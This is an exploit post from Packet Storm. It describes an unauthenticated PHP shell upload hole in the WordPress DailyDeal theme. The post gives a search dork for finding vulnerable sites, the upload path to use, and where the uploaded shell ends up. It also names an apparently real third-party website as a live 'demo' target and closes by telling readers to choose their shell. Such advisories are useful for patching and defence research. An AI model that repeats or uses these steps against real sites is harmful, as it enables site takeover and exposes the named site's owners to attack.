The WordPress DailyDeal theme suffers from a remote shell upload vulnerability.
25e1be2c8c9b97be0f84118170063bb8eed0a22e212c8a9be4176e00df086f59#Title : WordPress DailyDeal Themes Shell Upload Vulnerabillity
#Author : DevilScreaM
#Date : 10/23/2013
#Category : Web Applications
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerabillity : Shell Upload
#Dork : inurl:wp-content/themes/DailyDeal/
Exploit & POC
http://site-target/wp-content/themes/DailyDeal/monetize/upload/
Result Upload
http://site-target/wp-content/uploads/[years]/[months]/[Find_your_shell].php
Demo :
http://recreationgym.com.au/wp-content/themes/DailyDeal/monetize/upload/
Click Browse, And Choose your shell..
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed